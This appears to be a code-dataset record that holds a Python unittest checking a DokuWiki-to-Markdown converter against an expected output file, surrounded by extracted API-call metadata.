False, 'from tron import g, hub\n'), ((685, 708), 'socket.getfqdn', 'socket.getfqdn', (['otherIP'], {}), '(otherIP)\n', (699, 708), False, 'import socket\n'), ((1622, 1641), 'tron.hub.dropAcceptor', 'hub.dropAcceptor', (['a'], {}), '(a)\n', (1638, 1641), False, 'from tron import g, hub\n'), ((1664, 1679), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (1674, 1679), False, 'import time\n')] |
from unittest import TestCase
from pathlib import Path
from src.markdown_converter import MarkdownConverter
class TestMarkdownHeader(TestCase):
def setUp(self):
self.converter = MarkdownConverter("test/dokuwiki_example.txt")
def test_acceptance_test_case(self):
# python 3.5 and up
expected = Path("test/expected_markdown_output.txt").read_text()
actual = self.converter.convert()
print(actual)
self.assertEqual(expected, actual, "Files not matching!")
| [
"src.markdown_converter.MarkdownConverter",
"pathlib.Path"
] | [((194, 240), 'src.markdown_converter.MarkdownConverter', 'MarkdownConverter', (['"""test/dokuwiki_example.txt"""'], {}), "('test/dokuwiki_example.txt')\n", (211, 240), False, 'from src.markdown_converter import MarkdownConverter\n'), ((330, 371), 'pathlib.Path', 'Path', (['"""test/expected_markdown_output.txt"""'], {}), "('test/expected_markdown_output.txt')\n", (334, 371), False, 'from pathlib import Path\n')] |